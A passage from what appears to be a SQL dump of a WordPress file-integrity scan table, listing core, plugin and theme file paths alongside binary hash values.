�2Dç/�R��','wp-content/plugins/wp-smushit/app/assets/js/smush-react-configs.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u(�aZA�QPƢ','3[d�3���t6��>�?c�U\\�p�n�M��','',0,'?'),('~ť�s\0�1y�$�L}h','wp-config-sample.php',0,'R��f�{��Ƒ�g','R��f�{��Ƒ�g','xF��f^)=%rÃ����((8��~x~�','',0,'?'),('~�Ӹbc��\Z$�@$��*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*������mI','E��\0�.�����¿¯�1F�(Df�u�v��˔','',0,'?'),('~�J�-��a뜄jF��','wp-includes/wp-includes/widgets/class-wp-widget-calendar.php',0,'�Y	N��ɔ]7l�','�Y	N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('~�X�� �������$','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/az.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̃lѪ榼��K�6','��P��\"��~QO?���g<$a�ٓ�[H�Y!�]','',0,'?'),('~���F������:','wp-content/plugins/redirection/locale/json/redirection-fa_IR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�<r����]�i�','8���$�5�b`�v���\\��ྟY���Z�J','',0,'?'),('��T�\rs����:�','wp-content/plugins/wordpress-seo/src/deprecated/admin/notifiers/class-post-type-archive-notification-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�2���,�','IA[��^�i3`-3�Y��8M�ˑ��)`��&�eD','',0,'?'),('�ldK�м����','wp-includes/js/dist/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�!Q��͎E}','=v����׀�<6�Zu���Mfa�A6�D��k��','',0,'?'),('�@��o=�z�<F�%','wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/5�[�b�f�A���إ','aNAzV02�䭗���[^f�FlQ���\Z��|w8','',0,'?'),('\' M�2���%�	��','wp-includes/wp-includes/js/jquery/ui/selectmenu.js',0,'o�x� eqd���$I','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('.\\\\�JQ�-Y��','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-install-plugins-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Esn���o�h��`f�','؆�\"��8>��<fŒ @۳A�x�񩻰]��','',0,'?'),('6\0�O�kvzfTN','wp-includes/js/jquery/ui/effect-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:U�\Z��\"�U','	�V?��TŚ|H�^��U�ދ�I�J��D','',0,'?'),('6����f$T��g\'<','wp-content/plugins/redirection/locale/redirection-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�}��-5�)P���','C��vhy�)\"�j/��,���t�y�6��ҝ','',0,'?'),('7�.ʋ5���1�','wp-content/plugins/wordpress-seo/src/generators/schema/person.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9�Q>�U�I^��','�)���\Z9�wnq��?~�&���%3�Ԅ�_]��','',0,'?'),('@�={&����}�_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Ơ���H��xߗ�5�','�\\�f)�f�&Bx��j�E#]u�-e\"y6���','',0,'?'),('B�2j70�/�zLq��','wp-includes/css/dist/block-library/classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�ڛ���\nX;}�`9�','{0�x���^L,m�)˕^�~9��ɤ��6)ڻ�','',0,'?'),('W��\'�=�}�8B�̓\\','wp-content/plugins/wp-smushit/core/integrations/nextgen/class-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��Aa��>=�','�	u���x֊�L*MEL\Z�����pG�9���','',0,'?'),('c��J�w��eIO�Iq','wp-includes/blocks/cover/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\\����ٻ��  ','7��m�TQo27YY�\n�AJ�Id[�Zeq�w�i�','',0,'?'),('j&��^���b����','wp-includes/ms-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('j^��SN�-O� �','wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�S.�3���P�','�P6O�sn�{���n,)�H2z!\0X�-��','',0,'?'),('p��kA�h���ZM�B','wp-content/plugins/redirection/locale/redirection-lv.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.������ۜ$Q','&)ݡ;�5���2\"�!����P5t����-','',0,'?'),('tS�\"��lZ�c��Q','wp-admin/js/auth-app.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','04��z��>�s�,\r','S�\\��|3m�4�:��ϭq��B��\r�7�','',0,'?'),('w�\'�Pe��F�+��V\0','wp-includes/Requests/Proxy/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)ϕ\\�^��$���','7gy\Z��]O��Y�T���b�Pǚ昁��','',0,'?'),('}BfkV�=�15l��g','wp-includes/blocks/avatar/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���(\Z���Iz�','e2�,�Ք��e��n�C��L�]���s��+��','',0,'?'),('����oȂ�/	\"Y}','wp-includes/wp-includes/js/tinymce/tinymce.min.js',0,'Xl����̡C��kn','Xl����̡C��kn','�Zk�	�6|��{�*\Z��{�H����iܝk^','',0,'?'),('����w��_gB�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',0,'�f\"����#6${ JL\'\"','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('�g �T����᱙F\0','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexing/indexable-prepare-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0Be�r��~�t��\r+�','��T\n�=��>O&@J5}G�h��z�G�J����','',0,'?'),('�z���~48��l�Go8','wp-includes/js/dist/style-engine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�R��E����ȕ�','C�����\Z���ω�\"\0sq�%9�v��oS','',0,'?'),('�D�8-���¤r�l','wp-content/plugins/wordfence/images/logos/shield-care.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	� s�h߉\0��tv�','�f2\"(>�l�H93 ������	��C$�<','',0,'?'),('���eP�Mde���','wp-includes/wp-includes/registration.php',0,'���S��D��31�','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('��%G]f�@�%�Z��','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n^\r��#f��st��W\Z',':�taQE�&͜�����s١\nGb\\Z S1{�','',0,'?'),('�(9O)O˄0�J��','wp-includes/wp-includes/js/wp-sanitize.js',0,'���:k���E�t6Q��','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('�СqD֚?�i�X','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�JgMN�elwD�.v','�U�\';P^P��	�^0�d\0��Ѯ�P㛇�*�','',0,'?'),('�K�Q�}U&;&���Q','wp-includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P����O}-|�@h','\"3�����z1����C�p��i��ŵ��l-\'','',0,'?'),('�tr�εF_� ���','wp-includes/js/wp-emoji-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a9��Ч�����z','FM�li�<�~81,��Wp �AA���G�~','',0,'?'),('�ؖ��\\z����','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ServiceNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b����h\\�o�R���','�,�7=T�3�*rZ\\�����7�yaX&Dt�z','',0,'?'),('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|DZ(���r��q֧#','�)0������+���^h��v.(��>����','',0,'?'),('�Y�>j泸��I��#','wp-content/themes/hitmag/inc/kirki/assets/vendor/fontawesome/fontawesome.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҳm�]uC�\r�','�gyR#��ӸIQ�#\r]OҜ�x��脟t	���','',0,'?'),('������K�I+a���','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:`���s��l-I0��','�\r8q�bfu�;�[�I��t6��H{�&�|OF','',0,'?'),('�N�cɉᯊ��','wp-content/plugins/redirection/models/url/url-path.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{���iܟ�;�','$U@��~����a��-8&=kp;�����','',0,'?'),('�	tI��Ǵ=\r�n��','wp-includes/wp-includes/js/jquery/jquery.hotkeys.js',0,'j��hI�QLZA$Un�H�','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�&Ƀ$����(z����','wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<[�GK�d�u���B','kVF�C@�	*��b�7a4P>�\n݁�\"D���','',0,'?'),('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' o��n����C��-%','��\r�\r����έ4�H�lXr��UV`�(!%','',0,'?'),('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s���ڠz��\05\r','�h�}]J�DЙ������R� dX�K�T��3�','',0,'?'),('�Eћ�Pa\r����:�','wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',0,'��h���P���','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('�Mߋ,��/�B]WX\Z�','wp-includes/wp-includes/taxonomy.php',0,'�5��H\nC8h��:��N','�5��H\nC8h��:��N','I�\r�u}��؁���Yw�Su:<IF���','',0,'?'),('�~M���M*�Ӟ��[U','wp-includes/wp-includes/js/jquery/ui/core.js',0,'PC��\r�{�tk�\"x','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('��B��z��qt����','wp-content/plugins/wordpress-seo/js/dist/indexation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�ĒRŶ[HT1%�_W','�Æ�#J���擑Z��L����e�q�o=A_','',0,'?'),('��ah�#��8�c���','wp-includes/js/tinymce/themes/inlite/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('���r=����c���Mz','wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\01잓����K�1ܞM','�f�]Z�U��>���i�.��i�[�]����c','',0,'?'),('���!��h\Z�ɨ$\"R','wp-includes/css/dist/edit-site/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�!e��}yC�gfS[�','�>\0c\Z�����]�y�0s}�uy]���g<o��','',0,'?'),('���8���Vh�z�$','wp-content/plugins/wordpress-seo/css/dist/featured-image-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�.�	N�|8��b��','�Ī+4c�]�F��	�v�+��D��E&','',0,'?'),('��ں�u���M���[\r','wp-admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('��Nx��ډ\Z�8yH\\�','wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?tS��~5��~���','�w�T�}υ��*e�}�v�W�*!�E���H','',0,'?'),('��sSk�i�<4\'c�-6','wp-includes/js/wp-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~ג�\'�J\0���䯯','V_O\'����pk��;���`�O�\r��8h~��3K','',0,'?'),('���D���˕�!�+0�','wp-content/themes/hitmag/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bDb�<��`��%a�','���0���a�o���|��sMܨ?0�q��','',0,'?'),('���)e��.��\nO�','wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��0�GiQf���i6�','�<�	2�6^S�]įA��-�0L�}��2�` P�','',0,'?'),('�����^VjLZX�8t��','wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/installation-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!sPg�\0D���','��eA^�T�af}>��q[�-8��/��5&����','',0,'?'),('���e��97�aJS','wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('���?ւF�p��]���','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/id.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@be���`g2$M\ZG�','%�u�v������-��E��6k��f\\�Add','',0,'?'),('��XQ���d9r�ڼ��','wp-includes/customize/class-wp-customize-themes-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��vl��3��','�,V���3R�w���.���\r׭+4ݦ`=�`R','',0,'?'),('�cdcƚq�~�%��','wp-includes/blocks/navigation-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڛz�b)T\r�_{�W','7�f�X��=oT�;@�.�Ϭ�Q�:���կ�','',0,'?'),('�go�@>3:ۏՍ�h','wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>����\'%�bC��','|�.�#���f��Z�Z��Y	9��~���\Zr�K','',0,'?'),('�!2�P��a��B�|Q�','wp-includes/wp-includes/class-wp-comment.php',0,'J0n�N.��yƪb��','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('�&u�iO{u��E��','wp-content/plugins/wp-smushit/app/assets/images/incsub-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\�f���f�l ��','��c�I��s��\0���PSP���Tۆ����','',0,'?'),('�\'Xԣ����C�C�jD_','wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/link-count-notification-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��ݶ:�nj�+y��','I����|�G�C��k�:{Lªeޘ:��Ϋ�','',0,'?'),('�=^ԉRu39M%�!�','wp-content/plugins/wordpress-seo/src/integrations/admin/migration-error-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r	؈��\Z���_W28','v�*��G���\r$��E�Z�:۞��f�˜�','',0,'?'),('�I����+n��h^��','wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%l�)�&\r�-���','N�S4���רI����2�)^�Əri\0O�~��','',0,'?'),('�^#�3E�q���{�','wp-content/plugins/wordpress-seo/css/dist/search-appearance-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��T�Ph�&%�1k�D','��{(���Ն#���*���N�=����2�','',0,'?'),('�el�5�s��E�úQ�','wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5�.��4�ԝ�Ξ','�����ڦ\'�D�\Z�� v��0��E~��b�','',0,'?'),('��,CUU����9i-','wp-includes/css/wp-auth-check.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('�����?� E�ռ�U','wp-content/plugins/wordpress-seo/images/link-out-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)\"��&�S','��|���>�Ѳ��<���_]*[GXr�$��J','',0,'?'),('��)c ����̊>�4�','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',0,'<j��� �<Yt�#�&','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('��i�\Z!�[�8$\"�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('���[N ʩ�N:g�ܜ','wp-includes/wp-includes/images/smilies/icon_rolleyes.gif',0,'_5��6I���ĔE','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��?D���WЛo�%','wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-lazyload-default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����g�t� XL�9;=','�me�HZ�x�/�zU�3���/в���*O$sS','',0,'?'),('�ȉV?	��]�)A','wp-includes/js/media-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F������f}6','q8wP���K�.\'\'q���Tw&�0�5���','',0,'?'),('��Vk8������`�+','wp-includes/js/dist/development/react-refresh-entry.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��܇�{�{AvƸ�','�Է,�M�w}��_�9\'%���\0y��b','',0,'?'),('��P��?��Cmۄ��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/nl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��!\\yJ�Q�n�D	�','	ǚ�	Ug�����j~J�կ�#��OZu\n$','',0,'?'),('��`h�NkO�N8��','wp-includes/blocks/file/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fHT��1�F�p����','#�Μ�0Pt�	e�\Z���<����Mڂ�g','',0,'?'),('���W���=�ԘHd�z','wp-includes/class-wp-site-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Էm����f`�','|�Ϻ�`�FS�Ƃ(Y��\nP�*�6�՟��-NW','',0,'?'),('��X����-�4�J�_�3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\"����MJ�7Y(\nAj','�+�#>�9˖��9��?,ox���Q�N:��','',0,'?'),('����\'>�[��·�','wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h��%썬����\\B�','�:��\rۘ�Y��\0F�G/�т��SD��+$z.','',0,'?'),('��ȶ���OЗ]+:�','wp-content/plugins/wordpress-seo/css/dist/adminbar-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)��]ja`A�P','�S#l�f�JG���2���Q��/{l��٢','',0,'?'),('���Pd������c�3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.<$E�\0��g�:T�','ƝER%���f�\\�ɾ�\rv�8C�^�h','',0,'?'),('���\n�����Α�R','wp-content/plugins/wp-smushit/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��7����Y�1�)�','��ZBЏ-����,?�F�iw72Ux�Z��','',0,'?'),('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i����h�M�','\\�9!Tz�$���hS^��F����\n剾���','',0,'?'),('�wbS\r�a#�=�a','wp-content/plugins/wp-fastest-cache/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Fȇ���Mr���','<�=8fS823���&��Ao�\r�\"�2����','',0,'?'),('��\\�(��wB��I�','wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��	ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),('�$�+K71�y(�F���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I�B��*7>j_','�+��ܠWDd�}�_����Z���v39;�(','',0,'?'),('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('�.�7(IL�f�a5J���','wp-content/plugins/wp-fastest-cache/js/lang/fi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�e�Sq��=5�:+*�','8�ȕ�@n:\"�ߢ+Z�����{�����','',0,'?'),('�/	�E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),('�2S�%Gn�o��F�\'','wp-includes/wp-includes/css/dist/block-library/editor-rtl.css',0,'�\0}3�*�?�v�+,\"','�\0}3�*�?�v�+,\"','&tT=����ȼitg`^�5����2G��Vcg<','',0,'?'),('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-J�~�������','� |�D�O�?{��ٿ��%��ז�Y}��О','',0,'?'),('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�wT]�`L�G�','�<��9�u���[��8ԋ�B҃���X�%','',0,'?'),('�MȮs����%}�+=�','wp-includes/blocks/latest-posts/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���L������|�','J>\0�+�2��jVf԰��+��G�y5[����1�','',0,'?'),('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),('�Y��ػ�甩���*�','wp-includes/css/dist/edit-post/classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�k8�����w�',')SM��a����W2#K4 _J����R���','',0,'?'),('�`|y����	�I�hv3','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�v�ǐ�)ѿ��Ux�','��H�a]�K�	��h]��ͨ}ѥk�%����L�=','',0,'?'),('�l���;��$��	\n�','wp-content/plugins/wordpress-seo/js/dist/dashboard-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"y��?vR�(�g','\0�lVh�Fe���cQ����G�C:wϽn�','',0,'?'),('�m�i\Zt�T��(_�\rp�','wp-content/plugins/wordpress-seo/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�М�D��_�:z+�','A6���I��5��@�>!|kY��ӷ�$�IΑ�2','',0,'?'),('�p)�T\Z35�������','wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��L\"bs������+','�D��J~�`���aG���F���W!�:,K','',0,'?'),('�u�y�e�+�-pŨ�','wp-content/plugins/wp-cerber/assets/flags/ai.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:����2��s','C	vN\n\r����D%P:�\Z�w����B O� ','',0,'?'),('�w��5���)���','wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6��	؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('��M�����a�7π���','wp-content/plugins/wp-smushit/app/assets/js/smush-admin-common.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nA�/��^��hz��','z�y�{ʶ�Rn���l��2$&��-LJڐ�6�q','',0,'?'),('��\0���+OW+�','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),('����.M2���\\�','wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n_����P\Z�%�\Z��','N^=������9��D�|^1��U���sfv9','',0,'?'),('���j�~�G]�s=j','wp-content/themes/hitmag/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e����U\Zy�>�w!�','ѿ�N��Rv�I�DJn_�S~�l�����V�','',0,'?'),('�����A���1\Z�;�','wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#|O�1����\n݅�E','9T&F�-�D���lz��D��>�m�-L\\�q�','',0,'?'),('���V�=�	\"]��\Z�','wp-content/plugins/wordpress-seo/src/conditionals/updated-importer-framework-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��!��k�S���Y','b0�����},?�/�����Q�&��N�o','',0,'?'),('��?�;��fM�!Gn','wp-includes/wp-includes/js/dist/editor.js',0,'�&�60���6�k�/��','�&�60���6�k�/��','�O}���j�\\Eнe��(BL\Z$�핓1','',0,'?'),('���]�5�K���^\r�','wp-content/plugins/wp-cerber/admin/cerber-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{�ٟC��|�','G3�Xv���좡�dTq��]�Q>��#�����','',0,'?'),('���*e����Pn','wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php',0,'�T��i���詿/�!','�T��i���詿/�!','��(Y�E�U��<d�y���K	2�bsy�Z�L�','',0,'?'),('��{��h���B-o:Ih�','wp-includes/blocks/query-pagination-numbers/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Bپ��]G�h��EX','�3D�w�X,ח3o�$���s�o35�8]�V�n','',0,'?'),('��W�^�����T��,','wp-content/plugins/redirection/models/htaccess.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�\0x��l�XcF�u','p�.I�6��I�򧩔���/��4���{�+�','',0,'?'),('��5��h�--��;!','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontwatcher.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n/�˫8��E���','����[k�^�|�eD�&4	�΃2�iY����','',0,'?'),('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ȼ��k-ᵩȬ\"��','�\\�1�����+-�sĜ��\0�ۦ��ۿ�2�m�','',0,'?'),('�����[G�S	ԚZ�Q','wp-content/plugins/redirection/models/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*������XZ���=','\'�R\\p��}s��\Z�db:F�ի 5š�','',0,'?'),('��+{n�D�7�I���[','wp-content/plugins/wordpress-seo/src/conditionals/installation-success-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�YbʃEƝ�x!��n','K������-�\'Lk��Z}7U˚7�����0�','',0,'?'),('�	~=\"mÛ�\r\"�e�_','wp-content/plugins/wp-fastest-cache/inc/preload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A.��4Z%`n�.�','	